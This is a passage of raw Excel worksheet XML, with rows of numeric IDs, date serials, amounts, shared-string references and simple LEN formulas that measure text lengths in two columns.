      <c r="G808" s="1">
        <v>43980</v>
      </c>
      <c r="H808" s="4">
        <v>50000</v>
      </c>
      <c r="I808" t="s">
        <v>10874</v>
      </c>
      <c r="J808" t="s">
        <v>9572</v>
      </c>
      <c r="K808">
        <f>LEN(I808)</f>
        <v>55</v>
      </c>
      <c r="L808">
        <f>LEN(J808)</f>
        <v>15</v>
      </c>
    </row>
    <row r="809" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A809">
        <v>20796</v>
      </c>
      <c r="B809">
        <v>1490</v>
      </c>
      <c r="C809" t="s">
        <v>2820</v>
      </c>
      <c r="D809" t="s">
        <v>10367</v>
      </c>
      <c r="E809">
        <v>33</v>
      </c>
      <c r="F809" t="s">
        <v>2236</v>
      </c>
      <c r="G809" s="1">
        <v>43992</v>
      </c>
      <c r="H809">
        <v>0</v>
      </c>
      <c r="I809" t="s">
        <v>10986</v>
      </c>
      <c r="J809" t="s">
        <v>10858</v>
      </c>
      <c r="K809">
        <f>LEN(I809)</f>
        <v>33</v>
      </c>
      <c r="L809">
        <f>LEN(J809)</f>
        <v>15</v>
      </c>
    </row>
    <row r="810" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A810">
        <v>16911</v>
      </c>
      <c r="B810">
        <v>359</v>
      </c>
      <c r="C810" t="s">
        <v>517</v>
      </c>
      <c r="D810" t="s">
        <v>9570</v>
      </c>
      <c r="E810">
        <v>11</v>
      </c>
      <c r="F810" t="s">
        <v>9561</v>
      </c>
      <c r="G810" s="1">
        <v>43900</v>
      </c>
      <c r="H810">
        <v>100000</v>
      </c>
      <c r="I810" t="s">
        <v>9571</v>
      </c>
      <c r="J810" t="s">
        <v>9572</v>
      </c>
      <c r="K810">
        <f>LEN(I810)</f>
        <v>19</v>
      </c>
      <c r="L810">
        <f>LEN(J810)</f>
        <v>15</v>
      </c>
    </row>
    <row r="811" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A811">
        <v>16912</v>
      </c>
      <c r="B811">
        <v>359</v>
      </c>
      <c r="C811" t="s">
        <v>517</v>
      </c>
      <c r="D811" t="s">
        <v>9570</v>
      </c>
      <c r="E811">
        <v>11</v>
      </c>
      <c r="F811" t="s">
        <v>9562</v>
      </c>
      <c r="G811" s="1">
        <v>43900</v>
      </c>
      <c r="H811">
        <v>100000</v>
      </c>
      <c r="I811" t="s">
        <v>9571</v>
      </c>
      <c r="J811" t="s">
        <v>9572</v>
      </c>
      <c r="K811">
        <f>LEN(I811)</f>
        <v>19</v>
      </c>
      <c r="L811">
        <f>LEN(J811)</f>
        <v>15</v>
      </c>
    </row>
    <row r="812" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A812">
        <v>20312</v>
      </c>
      <c r="B812">
        <v>482</v>
      </c>
      <c r="C812" t="s">
        <v>863</v>
      </c>
      <c r="D812" t="s">
        <v>10620</v>
      </c>
      <c r="E812">
        <v>6</v>
      </c>
      <c r="F812" t="s">
        <v>9470</v>
      </c>
      <c r="G812" s="1">
        <v>43927</v>
      </c>
      <c r="H812">
        <v>50000</v>
      </c>
      <c r="I812" t="s">
        <v>9550</v>
      </c>
      <c r="J812" t="s">
        <v>9572</v>
      </c>
      <c r="K812">
        <f>LEN(I812)</f>
        <v>18</v>
      </c>
      <c r="L812">
        <f>LEN(J812)</f>
        <v>15</v>
      </c>
    </row>
    <row r="813" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A813">
        <v>20313</v>
      </c>
      <c r="B813">
        <v>482</v>
      </c>
      <c r="C813" t="s">
        <v>863</v>
      </c>
      <c r="D813" t="s">
        <v>10620</v>
      </c>
      <c r="E813">
        <v>6</v>
      </c>
      <c r="F813" t="s">
        <v>10463</v>
      </c>
      <c r="G813" s="1">
        <v>43927</v>
      </c>
      <c r="H813">
        <v>69000</v>
      </c>
      <c r="I813" t="s">
        <v>9550</v>
      </c>
      <c r="J813" t="s">
        <v>9572</v>
      </c>
      <c r="K813">
        <f>LEN(I813)</f>
        <v>18</v>
      </c>
      <c r="L813">
        <f>LEN(J813)</f>
        <v>15</v>
      </c>
    </row>
    <row r="814" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A814">
        <v>20629</v>
      </c>
      <c r="B814">
        <v>768</v>
      </c>
      <c r="C814" t="s">
        <v>16319</v>
      </c>
      <c r="D814" t="s">
        <v>16320</v>
      </c>
      <c r="E814">
        <v>16</v>
      </c>
      <c r="F814" t="s">
        <v>10857</v>
      </c>
      <c r="G814" s="1">
        <v>44032</v>
      </c>
      <c r="H814" s="4">
        <v>455000</v>
      </c>
      <c r="I814" t="s">
        <v>9485</v>
      </c>
      <c r="J814" t="s">
        <v>10858</v>
      </c>
      <c r="K814">
        <f>LEN(I814)</f>
        <v>18</v>
      </c>
      <c r="L814">
        <f>LEN(J814)</f>
        <v>15</v>
      </c>
    </row>
    <row r="815" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A815">
        <v>20742</v>
      </c>
      <c r="B815">
        <v>888</v>
      </c>
      <c r="C815" t="s">
        <v>3000</v>
      </c>
      <c r="D815" t="s">
        <v>10947</v>
      </c>
      <c r="E815">
        <v>12</v>
      </c>
      <c r="F815" t="s">
        <v>9437</v>
      </c>
      <c r="G815" s="1">
        <v>43984</v>
      </c>
      <c r="H815">
        <v>59273</v>
      </c>
      <c r="I815" t="s">
        <v>9550</v>
      </c>
      <c r="J815" t="s">
        <v>9572</v>
      </c>
      <c r="K815">
        <f>LEN(I815)</f>
        <v>18</v>
      </c>
      <c r="L815">
        <f>LEN(J815)</f>
        <v>15</v>
      </c>
    </row>
    <row r="816" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A816">
        <v>16844</v>
      </c>
      <c r="B816">
        <v>1310</v>
      </c>
      <c r="C816" t="s">
        <v>2473</v>
      </c>
      <c r="D816" t="s">
        <v>9507</v>
      </c>
      <c r="E816">
        <v>16</v>
      </c>
      <c r="F816" t="s">
        <v>9508</v>
      </c>
      <c r="G816" s="1">
        <v>43987</v>
      </c>
      <c r="H816">
        <v>60000</v>
      </c>
      <c r="J816" t="s">
        <v>9509</v>
      </c>
      <c r="K816">
        <f>LEN(I816)</f>
        <v>0</v>
      </c>
      <c r="L816">
        <f>LEN(J816)</f>
        <v>15</v>
      </c>
    </row>
    <row r="817" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A817">
        <v>16849</v>
      </c>
      <c r="B817">
        <v>88</v>
      </c>
      <c r="C817" t="s">
        <v>73</v>
      </c>
      <c r="D817" t="s">
        <v>9516</v>
      </c>
      <c r="E817">
        <v>14</v>
      </c>
      <c r="F817" t="s">
        <v>9437</v>
      </c>
      <c r="G817" s="1">
        <v>43873</v>
      </c>
      <c r="H817">
        <v>206356</v>
      </c>
      <c r="J817" t="s">
        <v>9518</v>
      </c>
      <c r="K817">
        <f>LEN(I817)</f>
        <v>0</v>
      </c>
      <c r="L817">
        <f>LEN(J817)</f>
        <v>15</v>
      </c>
    </row>
    <row r="818" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A818">
        <v>16869</v>
      </c>
      <c r="B818">
        <v>1310</v>
      </c>
      <c r="C818" t="s">
        <v>2473</v>
      </c>
      <c r="D818" t="s">
        <v>9507</v>
      </c>
      <c r="E818">
        <v>16</v>
      </c>
      <c r="F818" t="s">
        <v>9534</v>
      </c>
      <c r="G818" s="1">
        <v>43987</v>
      </c>
      <c r="H818">
        <v>3500000</v>
      </c>
      <c r="J818" t="s">
        <v>9509</v>
      </c>
      <c r="K818">
        <f>LEN(I818)</f>
        <v>0</v>
      </c>
      <c r="L818">
        <f>LEN(J818)</f>
        <v>15</v>
      </c>
    </row>
    <row r="819" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A819">
        <v>16870</v>
      </c>
      <c r="B819">
        <v>1310</v>
      </c>
      <c r="C819" t="s">
        <v>2473</v>
      </c>
      <c r="D819" t="s">
        <v>9507</v>
      </c>
      <c r="E819">
        <v>16</v>
      </c>
      <c r="F819" t="s">
        <v>9535</v>
      </c>
      <c r="G819" s="1">
        <v>43987</v>
      </c>
      <c r="H819">
        <v>1500000</v>
      </c>
      <c r="J819" t="s">
        <v>9509</v>
      </c>
      <c r="K819">
        <f>LEN(I819)</f>
        <v>0</v>
      </c>
      <c r="L819">
        <f>LEN(J819)</f>
        <v>15</v>
      </c>
    </row>
    <row r="820" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A820">
        <v>19728</v>
      </c>
      <c r="B820">
        <v>634</v>
      </c>
      <c r="C820" t="s">
        <v>494</v>
      </c>
      <c r="D820" t="s">
        <v>10205</v>
      </c>
      <c r="E820">
        <v>2</v>
      </c>
      <c r="F820" t="s">
        <v>9437</v>
      </c>
      <c r="G820" s="1">
        <v>43914</v>
      </c>
      <c r="H820">
        <v>200000</v>
      </c>
      <c r="J820" t="s">
        <v>9572</v>
      </c>
      <c r="K820">
        <f>LEN(I820)</f>
        <v>0</v>
      </c>
      <c r="L820">
        <f>LEN(J820)</f>
        <v>15</v>
      </c>
    </row>
    <row r="821" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A821">
        <v>19730</v>
      </c>
      <c r="B821">
        <v>634</v>
      </c>
      <c r="C821" t="s">
        <v>494</v>
      </c>
      <c r="D821" t="s">
        <v>10205</v>
      </c>
      <c r="E821">
        <v>2</v>
      </c>
      <c r="F821" t="s">
        <v>9435</v>
      </c>
      <c r="G821" s="1">
        <v>43914</v>
      </c>
      <c r="H821">
        <v>10000</v>
      </c>
      <c r="J821" t="s">
        <v>9509</v>
      </c>
      <c r="K821">
        <f>LEN(I821)</f>
        <v>0</v>
      </c>
      <c r="L821">
        <f>LEN(J821)</f>
        <v>15</v>
      </c>
    </row>
    <row r="822" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A822">
        <v>19809</v>
      </c>
      <c r="B822">
        <v>985</v>
      </c>
      <c r="C822" t="s">
        <v>16331</v>
      </c>
      <c r="D822" t="s">
        <v>16332</v>
      </c>
      <c r="E822">
        <v>17</v>
      </c>
      <c r="F822" t="s">
        <v>4686</v>
      </c>
      <c r="G822" s="1">
        <v>43970</v>
      </c>
      <c r="H822" s="4">
        <v>100000</v>
      </c>
      <c r="J822" t="s">
        <v>9518</v>
      </c>
      <c r="K822">
        <f>LEN(I822)</f>
        <v>0</v>
      </c>
      <c r="L822">
        <f>LEN(J822)</f>
        <v>15</v>
      </c>
    </row>
    <row r="823" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A823">
        <v>19810</v>
      </c>
      <c r="B823">
        <v>985</v>
      </c>
      <c r="C823" t="s">
        <v>2775</v>
      </c>
      <c r="D823" t="s">
        <v>10258</v>
      </c>
      <c r="E823">
        <v>17</v>
      </c>
      <c r="F823" t="s">
        <v>2236</v>
      </c>
      <c r="G823" s="1">
        <v>43970</v>
      </c>
      <c r="H823">
        <v>250</v>
      </c>
      <c r="J823" t="s">
        <v>9518</v>
      </c>
      <c r="K823">
        <f>LEN(I823)</f>
        <v>0</v>
      </c>
      <c r="L823">
        <f>LEN(J823)</f>
        <v>15</v>
      </c>
    </row>
    <row r="824" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A824">
        <v>20437</v>
      </c>
      <c r="B824">
        <v>2600</v>
      </c>
      <c r="C824" t="s">
        <v>4419</v>
      </c>
      <c r="D824" t="s">
        <v>10707</v>
      </c>
      <c r="E824">
        <v>14</v>
      </c>
      <c r="F824" t="s">
        <v>10714</v>
      </c>
      <c r="G824" s="1">
        <v>44299</v>
      </c>
      <c r="H824">
        <v>120384</v>
      </c>
      <c r="J824" t="s">
        <v>10715</v>
      </c>
      <c r="K824">
        <f>LEN(I824)</f>
        <v>0</v>
      </c>
      <c r="L824">
        <f>LEN(J824)</f>
        <v>15</v>
      </c>
    </row>
    <row r="825" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A825">
        <v>20843</v>
      </c>
      <c r="B825">
        <v>735</v>
      </c>
      <c r="C825" t="s">
        <v>1290</v>
      </c>
      <c r="D825" t="s">
        <v>11026</v>
      </c>
      <c r="E825">
        <v>2</v>
      </c>
      <c r="F825" t="s">
        <v>11027</v>
      </c>
      <c r="G825" s="1">
        <v>44071</v>
      </c>
      <c r="H825">
        <v>150000</v>
      </c>
      <c r="J825" t="s">
        <v>9509</v>
      </c>
      <c r="K825">
        <f>LEN(I825)</f>
        <v>0</v>
      </c>
      <c r="L825">
        <f>LEN(J825)</f>
        <v>15</v>
      </c>
    </row>
    <row r="826" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A826">
        <v>20915</v>
      </c>
      <c r="B826">
        <v>507</v>
      </c>
      <c r="C826" t="s">
        <v>1335</v>
      </c>
      <c r="D826" t="s">
        <v>11058</v>
      </c>
      <c r="E826">
        <v>29</v>
      </c>
      <c r="F826" t="s">
        <v>4686</v>
      </c>
      <c r="G826" s="1">
        <v>43977</v>
      </c>
      <c r="H826">
        <v>324000</v>
      </c>
      <c r="J826" t="s">
        <v>11059</v>
      </c>
      <c r="K826">
        <f>LEN(I826)</f>
        <v>0</v>
      </c>
      <c r="L826">
        <f>LEN(J826)</f>
        <v>15</v>
      </c>
    </row>
    <row r="827" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A827">
        <v>19737</v>
      </c>
      <c r="B827">
        <v>2564</v>
      </c>
      <c r="C827" t="s">
        <v>5276</v>
      </c>
      <c r="D827" t="s">
        <v>10210</v>
      </c>
      <c r="E827">
        <v>12</v>
      </c>
      <c r="F827" t="s">
        <v>9438</v>
      </c>
      <c r="G827" s="1">
        <v>43885</v>
      </c>
      <c r="H827">
        <v>0</v>
      </c>
      <c r="I827" t="s">
        <v>10212</v>
      </c>
      <c r="J827" t="s">
        <v>10213</v>
      </c>
      <c r="K827">
        <f>LEN(I827)</f>
        <v>186</v>
      </c>
      <c r="L827">
        <f>LEN(J827)</f>
        <v>13</v>
      </c>
    </row>
    <row r="828" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A828">
        <v>19589</v>
      </c>
      <c r="B828">
        <v>2590</v>
      </c>
      <c r="C828" t="s">
        <v>4375</v>
      </c>
      <c r="D828" t="s">
        <v>10106</v>
      </c>
      <c r="E828">
        <v>12</v>
      </c>
      <c r="F828" t="s">
        <v>10118</v>
      </c>
      <c r="G828" s="1">
        <v>43865</v>
      </c>
      <c r="H828">
        <v>100000</v>
      </c>
      <c r="I828" t="s">
        <v>10031</v>
      </c>
      <c r="J828" t="s">
        <v>9538</v>
      </c>
      <c r="K828">
        <f>LEN(I828)</f>
        <v>100</v>
      </c>
      <c r="L828">
        <f>LEN(J828)</f>
        <v>13</v>
      </c>
    </row>
    <row r="829" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A829">
        <v>20270</v>
      </c>
      <c r="B829">
        <v>2710</v>
      </c>
      <c r="C829" t="s">
        <v>6847</v>
      </c>
      <c r="D829" t="s">
        <v>10588</v>
      </c>
      <c r="E829">
        <v>29</v>
      </c>
      <c r="F829" t="s">
        <v>4686</v>
      </c>
      <c r="G829" s="1">
        <v>43934</v>
      </c>
      <c r="H829">
        <v>25000</v>
      </c>
      <c r="I829" t="s">
        <v>10010</v>
      </c>
      <c r="J829" t="s">
        <v>9538</v>
      </c>
      <c r="K829">
        <f>LEN(I829)</f>
        <v>33</v>
      </c>
      <c r="L829">
        <f>LEN(J829)</f>
        <v>13</v>
      </c>
    </row>
    <row r="830" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A830">
        <v>20271</v>
      </c>
      <c r="B830">
        <v>2710</v>
      </c>
      <c r="C830" t="s">
        <v>6847</v>
      </c>
      <c r="D830" t="s">
        <v>10588</v>
      </c>
      <c r="E830">
        <v>29</v>
      </c>
      <c r="F830" t="s">
        <v>2236</v>
      </c>
      <c r="G830" s="1">
        <v>43934</v>
      </c>
      <c r="H830">
        <v>25000</v>
      </c>
      <c r="I830" t="s">
        <v>10010</v>
      </c>
      <c r="J830" t="s">
        <v>9538</v>
      </c>
      <c r="K830">
        <f>LEN(I830)</f>
        <v>33</v>
      </c>
      <c r="L830">
        <f>LEN(J830)</f>
        <v>13</v>
      </c>
    </row>
    <row r="831" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A831">
        <v>20272</v>
      </c>
      <c r="B831">
        <v>2710</v>
      </c>
      <c r="C831" t="s">
        <v>6847</v>
      </c>
      <c r="D831" t="s">
        <v>10588</v>
      </c>
      <c r="E831">
        <v>29</v>
      </c>
      <c r="F831" t="s">
        <v>10589</v>
      </c>
      <c r="G831" s="1">
        <v>43934</v>
      </c>
      <c r="H831">
        <v>10000</v>
      </c>
      <c r="I831" t="s">
        <v>9693</v>
      </c>
      <c r="J831" t="s">
        <v>9538</v>
      </c>
      <c r="K831">
        <f>LEN(I831)</f>
        <v>33</v>
      </c>
      <c r="L831">
        <f>LEN(J831)</f>
        <v>13</v>
      </c>
    </row>
    <row r="832" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A832">
        <v>17430</v>
      </c>
      <c r="B832">
        <v>2241</v>
      </c>
      <c r="C832" t="s">
        <v>5775</v>
      </c>
      <c r="D832" t="s">
        <v>9743</v>
      </c>
      <c r="E832">
        <v>16</v>
      </c>
      <c r="F832" t="s">
        <v>9535</v>
      </c>
      <c r="G832" s="1">
        <v>43907</v>
      </c>
      <c r="H832">
        <v>300000</v>
      </c>
      <c r="I832" t="s">
        <v>9536</v>
      </c>
      <c r="J832" t="s">
        <v>9538</v>
      </c>
      <c r="K832">
        <f>LEN(I832)</f>
        <v>13</v>
      </c>
      <c r="L832">
        <f>LEN(J832)</f>
        <v>13</v>
      </c>
    </row>
    <row r="833" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A833">
        <v>17432</v>
      </c>
      <c r="B833">
        <v>2241</v>
      </c>
      <c r="C833" t="s">
        <v>5775</v>
      </c>
      <c r="D833" t="s">
        <v>9743</v>
      </c>
      <c r="E833">
        <v>16</v>
      </c>
      <c r="F833" t="s">
        <v>9788</v>
      </c>
      <c r="G833" s="1">
        <v>43907</v>
      </c>
      <c r="H833">
        <v>1200000</v>
      </c>
      <c r="I833" t="s">
        <v>9536</v>
      </c>
      <c r="J833" t="s">
        <v>9538</v>
      </c>
      <c r="K833">
        <f>LEN(I833)</f>
        <v>13</v>
      </c>
      <c r="L833">
        <f>LEN(J833)</f>
        <v>13</v>
      </c>
    </row>
    <row r="834" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A834">
        <v>20805</v>
      </c>
      <c r="B834">
        <v>420</v>
      </c>
      <c r="C834" t="s">
        <v>897</v>
      </c>
      <c r="D834" t="s">
        <v>10992</v>
      </c>
      <c r="E834">
        <v>29</v>
      </c>
      <c r="F834" t="s">
        <v>2236</v>
      </c>
      <c r="G834" s="1">
        <v>43971</v>
      </c>
      <c r="H834">
        <v>30000</v>
      </c>
      <c r="I834" t="s">
        <v>9536</v>
      </c>
      <c r="J834" t="s">
        <v>9538</v>
      </c>
      <c r="K834">
        <f>LEN(I834)</f>
        <v>13</v>
      </c>
      <c r="L834">
        <f>LEN(J834)</f>
        <v>13</v>
      </c>
    </row>
    <row r="835" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A835">
        <v>16874</v>
      </c>
      <c r="B835">
        <v>306</v>
      </c>
      <c r="C835" t="s">
        <v>119</v>
      </c>
      <c r="D835" t="s">
        <v>9537</v>
      </c>
      <c r="E835">
        <v>14</v>
      </c>
      <c r="F835" t="s">
        <v>385</v>
      </c>
      <c r="G835" s="1">
        <v>43888</v>
      </c>
      <c r="H835">
        <v>679926</v>
      </c>
      <c r="J835" t="s">
        <v>9538</v>
      </c>
      <c r="K835">
        <f>LEN(I835)</f>
        <v>0</v>
      </c>
      <c r="L835">
        <f>LEN(J835)</f>
        <v>13</v>
      </c>
    </row>
    <row r="836" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A836">
        <v>17032</v>
      </c>
      <c r="B836">
        <v>1598</v>
      </c>
      <c r="C836" t="s">
        <v>2703</v>
      </c>
      <c r="D836" t="s">
        <v>9630</v>
      </c>
      <c r="E836">
        <v>26</v>
      </c>
      <c r="F836" t="s">
        <v>9634</v>
      </c>
      <c r="G836" s="1">
        <v>43851</v>
      </c>
      <c r="H836">
        <v>20000</v>
      </c>
      <c r="J836" t="s">
        <v>9538</v>
      </c>
      <c r="K836">
        <f>LEN(I836)</f>
        <v>0</v>
      </c>
      <c r="L836">
        <f>LEN(J836)</f>
        <v>13</v>
      </c>
    </row>
    <row r="837" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A837">
        <v>17312</v>
      </c>
      <c r="B837">
        <v>1057</v>
      </c>
      <c r="C837" t="s">
        <v>2895</v>
      </c>
      <c r="D837" t="s">
        <v>9768</v>
      </c>
      <c r="E837">
        <v>11</v>
      </c>
      <c r="F837" t="s">
        <v>9769</v>
      </c>
      <c r="G837" s="1">
        <v>43840</v>
      </c>
      <c r="H837">
        <v>350000</v>
      </c>
      <c r="J837" t="s">
        <v>9538</v>
      </c>
      <c r="K837">
        <f>LEN(I837)</f>
        <v>0</v>
      </c>
      <c r="L837">
        <f>LEN(J837)</f>
        <v>13</v>
      </c>
    </row>
    <row r="838" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A838">
        <v>19253</v>
      </c>
      <c r="B838">
        <v>2359</v>
      </c>
      <c r="C838" t="s">
        <v>4795</v>
      </c>
      <c r="D838" t="s">
        <v>9873</v>
      </c>
      <c r="E838">
        <v>16</v>
      </c>
      <c r="F838" t="s">
        <v>1016</v>
      </c>
      <c r="G838" s="1">
        <v>44369</v>
      </c>
      <c r="H838">
        <v>150000</v>
      </c>
      <c r="J838" t="s">
        <v>9538</v>
      </c>
      <c r="K838">
        <f>LEN(I838)</f>
        <v>0</v>
      </c>
      <c r="L838">
        <f>LEN(J838)</f>
        <v>13</v>
      </c>
    </row>
    <row r="839" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A839">
        <v>19347</v>
      </c>
      <c r="B839">
        <v>2537</v>
      </c>
      <c r="C839" t="s">
        <v>5000</v>
      </c>
      <c r="D839" t="s">
        <v>9942</v>
      </c>
      <c r="E839">
        <v>14</v>
      </c>
      <c r="F839" t="s">
        <v>1016</v>
      </c>
      <c r="G839" s="1">
        <v>43936</v>
      </c>
      <c r="H839">
        <v>108000</v>
      </c>
      <c r="J839" t="s">
        <v>9538</v>
      </c>
      <c r="K839">
        <f>LEN(I839)</f>
        <v>0</v>
      </c>
      <c r="L839">
        <f>LEN(J839)</f>
        <v>13</v>
      </c>
    </row>
    <row r="840" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A840">
        <v>19348</v>
      </c>
      <c r="B840">
        <v>465</v>
      </c>
      <c r="C840" t="s">
        <v>240</v>
      </c>
      <c r="D840" t="s">
        <v>9943</v>
      </c>
      <c r="E840">
        <v>14</v>
      </c>
      <c r="F840" t="s">
        <v>2407</v>
      </c>
      <c r="G840" s="1">
        <v>43882</v>
      </c>
      <c r="H840">
        <v>19000</v>
      </c>
      <c r="J840" t="s">
        <v>9538</v>
      </c>
      <c r="K840">
        <f>LEN(I840)</f>
        <v>0</v>
      </c>
      <c r="L840">
        <f>LEN(J840)</f>
        <v>13</v>
      </c>
    </row>
    <row r="841" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A841">
        <v>19387</v>
      </c>
      <c r="B841">
        <v>1715</v>
      </c>
      <c r="C841" t="s">
        <v>16333</v>
      </c>
      <c r="D841" t="s">
        <v>16334</v>
      </c>
      <c r="E841">
        <v>10</v>
      </c>
      <c r="F841" t="s">
        <v>2407</v>
      </c>
      <c r="G841" s="1">
        <v>43875</v>
      </c>
      <c r="H841" s="4">
        <v>100000</v>
      </c>
      <c r="J841" t="s">
        <v>9538</v>
      </c>
      <c r="K841">
        <f>LEN(I841)</f>
        <v>0</v>
      </c>
      <c r="L841">
        <f>LEN(J841)</f>
        <v>13</v>
      </c>
    </row>
    <row r="842" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A842">
        <v>19452</v>
      </c>
      <c r="B842">
        <v>388</v>
      </c>
      <c r="C842" t="s">
        <v>383</v>
      </c>
      <c r="D842" t="s">
        <v>10052</v>
      </c>
      <c r="E842">
        <v>16</v>
      </c>
      <c r="F842" t="s">
        <v>385</v>
      </c>
      <c r="G842" s="1">
        <v>43928</v>
      </c>
      <c r="H842">
        <v>108291</v>
      </c>
      <c r="J842" t="s">
        <v>9538</v>
      </c>
      <c r="K842">
        <f>LEN(I842)</f>
        <v>0</v>
      </c>
      <c r="L842">
        <f>LEN(J842)</f>
        <v>13</v>
      </c>
    </row>
    <row r="843" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A843">
        <v>19456</v>
      </c>
      <c r="B843">
        <v>2337</v>
      </c>
      <c r="C843" t="s">
        <v>5129</v>
      </c>
      <c r="D843" t="s">
        <v>10053</v>
      </c>
      <c r="E843">
        <v>12</v>
      </c>
      <c r="F843" t="s">
        <v>9437</v>
      </c>
      <c r="G843" s="1">
        <v>44011</v>
      </c>
      <c r="H843">
        <v>100000</v>
      </c>
      <c r="J843" t="s">
        <v>10059</v>
      </c>
      <c r="K843">
        <f>LEN(I843)</f>
        <v>0</v>
      </c>
      <c r="L843">
        <f>LEN(J843)</f>
        <v>13</v>
      </c>
    </row>
    <row r="844" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A844">
        <v>19904</v>
      </c>
      <c r="B844">
        <v>442</v>
      </c>
      <c r="C844" t="s">
        <v>560</v>
      </c>
      <c r="D844" t="s">
        <v>10317</v>
      </c>
      <c r="E844">
        <v>16</v>
      </c>
      <c r="F844" t="s">
        <v>673</v>
      </c>
      <c r="G844" s="1">
        <v>43921</v>
      </c>
      <c r="H844">
        <v>855200</v>
      </c>
      <c r="J844" t="s">
        <v>9538</v>
      </c>
      <c r="K844">
        <f>LEN(I844)</f>
        <v>0</v>
      </c>
      <c r="L844">
        <f>LEN(J844)</f>
        <v>13</v>
      </c>
    </row>
    <row r="845" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A845">
        <v>19905</v>
      </c>
      <c r="B845">
        <v>442</v>
      </c>
      <c r="C845" t="s">
        <v>560</v>
      </c>
      <c r="D845" t="s">
        <v>10317</v>
      </c>
      <c r="E845">
        <v>16</v>
      </c>
      <c r="F845" t="s">
        <v>9441</v>
      </c>
      <c r="G845" s="1">
        <v>43921</v>
      </c>
      <c r="H845">
        <v>1166020</v>
      </c>
      <c r="J845" t="s">
        <v>9538</v>
      </c>
      <c r="K845">
        <f>LEN(I845)</f>
        <v>0</v>
      </c>
      <c r="L845">
        <f>LEN(J845)</f>
        <v>13</v>
      </c>
    </row>
    <row r="846" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A846">
        <v>19918</v>
      </c>
      <c r="B846">
        <v>1639</v>
      </c>
      <c r="C846" t="s">
        <v>2812</v>
      </c>
      <c r="D846" t="s">
        <v>10329</v>
      </c>
      <c r="E846">
        <v>17</v>
      </c>
      <c r="F846" t="s">
        <v>2236</v>
      </c>
      <c r="G846" s="1">
        <v>43916</v>
      </c>
      <c r="H846">
        <v>30000</v>
      </c>
      <c r="J846" t="s">
        <v>9538</v>
      </c>
      <c r="K846">
        <f>LEN(I846)</f>
        <v>0</v>
      </c>
      <c r="L846">
        <f>LEN(J846)</f>
        <v>13</v>
      </c>
    </row>
    <row r="847" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A847">
        <v>19933</v>
      </c>
      <c r="B847">
        <v>2604</v>
      </c>
      <c r="C847" t="s">
        <v>5514</v>
      </c>
      <c r="D847" t="s">
        <v>10342</v>
      </c>
      <c r="E847">
        <v>12</v>
      </c>
      <c r="F847" t="s">
        <v>10343</v>
      </c>
      <c r="G847" s="1">
        <v>43899</v>
      </c>
      <c r="H847">
        <v>1000000</v>
      </c>
      <c r="J847" t="s">
        <v>9538</v>
      </c>
      <c r="K847">
        <f>LEN(I847)</f>
        <v>0</v>
      </c>
      <c r="L847">
        <f>LEN(J847)</f>
        <v>13</v>
      </c>
    </row>
    <row r="848" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A848">
        <v>19972</v>
      </c>
      <c r="B848">
        <v>674</v>
      </c>
      <c r="C848" t="s">
        <v>588</v>
      </c>
      <c r="D848" t="s">
        <v>10363</v>
      </c>
      <c r="E848">
        <v>17</v>
      </c>
      <c r="F848" t="s">
        <v>10364</v>
      </c>
      <c r="G848" s="1">
        <v>43913</v>
      </c>
      <c r="H848">
        <v>0</v>
      </c>
      <c r="J848" t="s">
        <v>9538</v>
      </c>
      <c r="K848">
        <f>LEN(I848)</f>
        <v>0</v>
      </c>
      <c r="L848">
        <f>LEN(J848)</f>
        <v>13</v>
      </c>
    </row>
    <row r="849" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A849">
        <v>19973</v>
      </c>
      <c r="B849">
        <v>674</v>
      </c>
      <c r="C849" t="s">
        <v>588</v>
      </c>
      <c r="D849" t="s">
        <v>10363</v>
      </c>
      <c r="E849">
        <v>17</v>
      </c>
      <c r="F849" t="s">
        <v>10365</v>
      </c>
      <c r="G849" s="1">
        <v>43913</v>
      </c>
      <c r="H849">
        <v>0</v>
      </c>
      <c r="J849" t="s">
        <v>9538</v>
      </c>
      <c r="K849">
        <f>LEN(I849)</f>
        <v>0</v>
      </c>
      <c r="L849">
        <f>LEN(J849)</f>
        <v>13</v>
      </c>
    </row>
    <row r="850" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A850">
        <v>19974</v>
      </c>
      <c r="B850">
        <v>674</v>
      </c>
      <c r="C850" t="s">
        <v>588</v>
      </c>
      <c r="D850" t="s">
        <v>10363</v>
      </c>
      <c r="E850">
        <v>17</v>
      </c>
      <c r="F850" t="s">
        <v>4686</v>
      </c>
      <c r="G850" s="1">
        <v>43913</v>
      </c>
      <c r="H850">
